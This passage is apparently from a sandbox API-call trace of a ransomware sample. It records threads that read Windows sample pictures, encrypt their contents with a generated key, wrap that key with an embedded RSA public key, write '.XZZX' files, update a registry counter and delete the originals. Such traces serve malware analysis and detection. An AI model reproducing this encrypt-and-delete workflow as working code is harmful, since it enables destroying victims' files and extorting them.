hFile=0x894, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ee438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ee438*=0x5, lpOverlapped=0x0) returned 1 [0144.723] GetUserNameW (in: lpBuffer=0x42ee1f8, pcbBuffer=0x42edfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42edfe0) returned 1 [0144.724] wsprintfW (in: param_1=0x42edff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0144.724] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42edfe4 | out: phkResult=0x42edfe4*=0x8c8) returned 0x0 [0144.724] RegQueryValueExW (in: hKey=0x8c8, lpValueName="E1010314", lpReserved=0x0, lpType=0x42edfd8, lpData=0x42edfec, lpcbData=0x42edfdc*=0x4 | out: lpType=0x42edfd8*=0x4, lpData=0x42edfec*=0xd2, lpcbData=0x42edfdc*=0x4) returned 0x0 [0144.724] RegCloseKey (hKey=0x8c8) returned 0x0 [0144.724] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42edfe8 | out: phkResult=0x42edfe8*=0x8c8) returned 0x0 [0144.724] RegSetValueExW (in: hKey=0x8c8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42edfec*=0xd3, cbData=0x4 | out: lpData=0x42edfec*=0xd3) returned 0x0 [0144.724] RegCloseKey (hKey=0x8c8) returned 0x0 [0144.724] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.725] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.725] CloseHandle (hObject=0x894) returned 1 [0144.736] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0144.737] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0144.737] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg")) returned 1 [0144.742] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg")) returned 0 Thread: id = 517 os_tid = 0xb74 [0144.650] lstrcpyA (in: lpString1=0x471fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0144.650] lstrcpyW (in: lpString1=0x471f460, lpString2="Koala.jpg" | out: lpString1="Koala.jpg") returned="Koala.jpg" [0144.650] lstrcpyW (in: lpString1=0x471e860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0144.650] SetErrorMode (uMode=0x1) returned 0x1 [0144.650] lstrcpyW (in: lpString1=0x471f860, lpString2="Koala.jpg" | out: lpString1="Koala.jpg") returned="Koala.jpg" [0144.650] CoCreateGuid (in: pguid=0x471e440 | out: pguid=0x471e440*(Data1=0x8ee9fd28, Data2=0xf010, Data3=0x44af, Data4=([0]=0x9f, [1]=0xad, [2]=0x68, [3]=0x6e, [4]=0x65, [5]=0x2d, [6]=0x42, [7]=0xb))) returned 0x0 [0144.650] wsprintfW (in: param_1=0x471ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 54 [0144.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x471fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0144.650] wsprintfW (in: param_1=0x471e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\4BF5528040685AF08EE9FD2844DA3F38.XZZX") returned 82 [0144.650] StrStrW (lpFirst="Koala.jpg", lpSrch="XZZX") returned 0x0 [0144.650] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", dwFileAttributes=0x20) returned 1 [0144.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x894 [0144.651] ReadFile (in: hFile=0x894, lpBuffer=0x4720020, nNumberOfBytesToRead=0xbea1f, lpNumberOfBytesRead=0x471e418, lpOverlapped=0x0 | out: lpBuffer=0x4720020*, lpNumberOfBytesRead=0x471e418*=0xbea1f, lpOverlapped=0x0) returned 1 [0144.659] CloseHandle (hObject=0x894) returned 1 [0144.659] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0144.660] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4110000 [0144.660] SetErrorMode (uMode=0x1) returned 0x1 [0144.660] lstrcpyW (in: lpString1=0x471e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0144.660] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x4379f20) returned 1 [0144.663] CryptGenKey (in: hProv=0x4379f20, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11cd8) returned 1 [0145.037] CryptExportKey (in: hKey=0x3d11cd8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x471e41c | out: pbData=0x0*, pdwDataLen=0x471e41c*=0x94) returned 1 [0145.037] CryptExportKey (in: hKey=0x3d11cd8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4110000, pdwDataLen=0x471e41c | out: pbData=0x4110000*, pdwDataLen=0x471e41c*=0x94) returned 1 [0145.037] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0145.038] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0145.038] CryptDestroyKey (hKey=0x3d11cd8) returned 1 [0145.038] CryptReleaseContext (hProv=0x437a0b8, dwFlags=0x0) returned 0 [0145.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\4BF5528040685AF08EE9FD2844DA3F38.XZZX" (normalized: "c:\\users\\public\\pictures\\sample pictures\\4bf5528040685af08ee9fd2844da3f38.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8dc [0145.041] WriteFile (in: hFile=0x8dc, lpBuffer=0x4720020*, nNumberOfBytesToWrite=0xbea1f, lpNumberOfBytesWritten=0x471e438, lpOverlapped=0x0 | out: lpBuffer=0x4720020*, lpNumberOfBytesWritten=0x471e438*=0xbea1f, lpOverlapped=0x0) returned 1 [0145.051] SetFilePointer (in: hFile=0x8dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbea1f [0145.051] WriteFile (in: hFile=0x8dc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x471e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x471e438*=0x5, lpOverlapped=0x0) returned 1 [0145.051] SetFilePointer (in: hFile=0x8dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbea24 [0145.051] WriteFile (in: hFile=0x8dc, lpBuffer=0x471f860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x471e438, lpOverlapped=0x0 | out: lpBuffer=0x471f860*, lpNumberOfBytesWritten=0x471e438*=0x12, lpOverlapped=0x0) returned 1 [0145.051] SetFilePointer (in: hFile=0x8dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbea36 [0145.051] WriteFile (in: hFile=0x8dc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x471e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x471e438*=0x5, lpOverlapped=0x0) returned 1 [0145.051] SetFilePointer (in: hFile=0x8dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbea3b [0145.051] SetErrorMode (uMode=0x1) returned 0x1 [0145.051] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0145.051] OutputDebugStringW (lpOutputString="end") [0145.051] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õq\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x471dbf4, pcbBinary=0x471d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x471dbf4, pcbBinary=0x471d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0145.051] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x471dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x471d3dc, pcbStructInfo=0x471d3d8 | out: pvStructInfo=0x471d3dc, pcbStructInfo=0x471d3d8) returned 1 [0145.051] CryptAcquireContextW (in: phProv=0x471d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x471d3e4*=0x437a140) returned 1 [0145.052] CryptImportPublicKeyInfo (in: hCryptProv=0x437a140, dwCertEncodingType=0x1, pInfo=0x3cf2e40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf2e70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf2e78*, PublicKey.cUnusedBits=0x0), phKey=0x471d3ec | out: phKey=0x471d3ec*=0x3d11cd8) returned 1 [0145.052] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0145.053] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0145.053] CryptEncrypt (in: hKey=0x3d11cd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x471d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x471d3f0*=0x80) returned 1 [0145.053] CryptEncrypt (in: hKey=0x3d11cd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x437a1c8*, pdwDataLen=0x471d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x437a1c8*, pdwDataLen=0x471d3e8*=0x80) returned 1 [0145.053] WriteFile (in: hFile=0x8dc, lpBuffer=0x437a1c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x471e438, lpOverlapped=0x0 | out: lpBuffer=0x437a1c8*, lpNumberOfBytesWritten=0x471e438*=0x80, lpOverlapped=0x0) returned 1 [0145.053] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0145.053] WriteFile (in: hFile=0x8dc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x471e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x471e438*=0x5, lpOverlapped=0x0) returned 1 [0145.053] GetUserNameW (in: lpBuffer=0x471e1f8, pcbBuffer=0x471dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x471dfe0) returned 1 [0145.054] wsprintfW (in: param_1=0x471dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0145.054] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x471dfe4 | out: phkResult=0x471dfe4*=0x8e0) returned 0x0 [0145.054] RegQueryValueExW (in: hKey=0x8e0, lpValueName="E1010314", lpReserved=0x0, lpType=0x471dfd8, lpData=0x471dfec, lpcbData=0x471dfdc*=0x4 | out: lpType=0x471dfd8*=0x4, lpData=0x471dfec*=0xd3, lpcbData=0x471dfdc*=0x4) returned 0x0 [0145.054] RegCloseKey (hKey=0x8e0) returned 0x0 [0145.054] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x471dfe8 | out: phkResult=0x471dfe8*=0x8e0) returned 0x0 [0145.058] RegSetValueExW (in: hKey=0x8e0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x471dfec*=0xd4, cbData=0x4 | out: lpData=0x471dfec*=0xd4) returned 0x0 [0145.058] RegCloseKey (hKey=0x8e0) returned 0x0 [0145.058] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.058] VirtualFree (lpAddress=0x4110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0145.059] CloseHandle (hObject=0x8dc) returned 1 [0145.166] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0145.167] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0145.167] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg")) returned 1 [0145.172] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg")) returned 0 Thread: id = 518 os_tid = 0xb78 [0144.837] lstrcpyA (in: lpString1=0x425fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0144.837] lstrcpyW (in: lpString1=0x425f460, lpString2="Lighthouse.jpg" | out: lpString1="Lighthouse.jpg") returned="Lighthouse.jpg" [0144.837] lstrcpyW (in: lpString1=0x425e860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0144.837] SetErrorMode (uMode=0x1) returned 0x1 [0144.837] lstrcpyW (in: lpString1=0x425f860, lpString2="Lighthouse.jpg" | out: lpString1="Lighthouse.jpg") returned="Lighthouse.jpg" [0144.837] CoCreateGuid (in: pguid=0x425e440 | out: pguid=0x425e440*(Data1=0xe54a8896, Data2=0x63c7, Data3=0x4455, Data4=([0]=0x80, [1]=0x84, [2]=0x97, [3]=0x7f, [4]=0xfc, [5]=0xb8, [6]=0xb, [7]=0x26))) returned 0x0 [0144.837] wsprintfW (in: param_1=0x425ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 59 [0144.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x425fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0144.837] wsprintfW (in: param_1=0x425e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\0FC22E9A1AA1FD13E54A88961EC7E15B.XZZX") returned 82 [0144.837] StrStrW (lpFirst="Lighthouse.jpg", lpSrch="XZZX") returned 0x0 [0144.837] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg", dwFileAttributes=0x20) returned 1 [0144.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\lighthouse.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8d4 [0144.884] ReadFile (in: hFile=0x8d4, lpBuffer=0x4260020, nNumberOfBytesToRead=0x8907c, lpNumberOfBytesRead=0x425e418, lpOverlapped=0x0 | out: lpBuffer=0x4260020*, lpNumberOfBytesRead=0x425e418*=0x8907c, lpOverlapped=0x0) returned 1 [0144.892] CloseHandle (hObject=0x8d4) returned 1 [0144.892] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0144.893] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0144.893] SetErrorMode (uMode=0x1) returned 0x1 [0144.893] lstrcpyW (in: lpString1=0x425e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0144.893] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x437a0b8) returned 1 [0144.896] CryptGenKey (in: hProv=0x437a0b8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11d58) returned 1 [0145.370] CryptExportKey (in: hKey=0x3d11d58, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x425e41c | out: pbData=0x0*, pdwDataLen=0x425e41c*=0x94) returned 1 [0145.370] CryptExportKey (in: hKey=0x3d11d58, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x425e41c | out: pbData=0x40a0000*, pdwDataLen=0x425e41c*=0x94) returned 1 [0145.370] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0145.382] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0145.382] CryptDestroyKey (hKey=0x3d11d58) returned 1 [0145.382] CryptReleaseContext (hProv=0x437a250, dwFlags=0x0) returned 0 [0145.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\0FC22E9A1AA1FD13E54A88961EC7E15B.XZZX" (normalized: "c:\\users\\public\\pictures\\sample pictures\\0fc22e9a1aa1fd13e54a88961ec7e15b.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88c [0145.434] WriteFile (in: hFile=0x88c, lpBuffer=0x4260020*, nNumberOfBytesToWrite=0x8907c, lpNumberOfBytesWritten=0x425e438, lpOverlapped=0x0 | out: lpBuffer=0x4260020*, lpNumberOfBytesWritten=0x425e438*=0x8907c, lpOverlapped=0x0) returned 1 [0145.444] SetFilePointer (in: hFile=0x88c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8907c [0145.444] WriteFile (in: hFile=0x88c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x425e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x425e438*=0x5, lpOverlapped=0x0) returned 1 [0145.444] SetFilePointer (in: hFile=0x88c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x89081 [0145.444] WriteFile (in: hFile=0x88c, lpBuffer=0x425f860*, nNumberOfBytesToWrite=0x1c, lpNumberOfBytesWritten=0x425e438, lpOverlapped=0x0 | out: lpBuffer=0x425f860*, lpNumberOfBytesWritten=0x425e438*=0x1c, lpOverlapped=0x0) returned 1 [0145.445] SetFilePointer (in: hFile=0x88c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8909d [0145.445] WriteFile (in: hFile=0x88c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x425e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x425e438*=0x5, lpOverlapped=0x0) returned 1 [0145.445] SetFilePointer (in: hFile=0x88c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x890a2 [0145.445] SetErrorMode (uMode=0x1) returned 0x1 [0145.445] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0145.445] OutputDebugStringW (lpOutputString="end") [0145.445] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ%\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x425dbf4, pcbBinary=0x425d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x425dbf4, pcbBinary=0x425d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0145.445] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x425dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x425d3dc, pcbStructInfo=0x425d3d8 | out: pvStructInfo=0x425d3dc, pcbStructInfo=0x425d3d8) returned 1 [0145.445] CryptAcquireContextW (in: phProv=0x425d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x425d3e4*=0x437a2d8) returned 1 [0145.446] CryptImportPublicKeyInfo (in: hCryptProv=0x437a2d8, dwCertEncodingType=0x1, pInfo=0x3cf2ca0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf2cd0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf2cd8*, PublicKey.cUnusedBits=0x0), phKey=0x425d3ec | out: phKey=0x425d3ec*=0x3d11d58) returned 1 [0145.446] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0145.447] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0145.447] CryptEncrypt (in: hKey=0x3d11d58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x425d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x425d3f0*=0x80) returned 1 [0145.447] CryptEncrypt (in: hKey=0x3d11d58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x437a360*, pdwDataLen=0x425d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x437a360*, pdwDataLen=0x425d3e8*=0x80) returned 1 [0145.447] WriteFile (in: hFile=0x88c, lpBuffer=0x437a360*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x425e438, lpOverlapped=0x0 | out: lpBuffer=0x437a360*, lpNumberOfBytesWritten=0x425e438*=0x80, lpOverlapped=0x0) returned 1 [0145.447] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0145.447] WriteFile (in: hFile=0x88c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x425e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x425e438*=0x5, lpOverlapped=0x0) returned 1 [0145.447] GetUserNameW (in: lpBuffer=0x425e1f8, pcbBuffer=0x425dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x425dfe0) returned 1 [0145.447] wsprintfW (in: param_1=0x425dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0145.447] RegCreateKeyW (in: hKey=0x80000001, 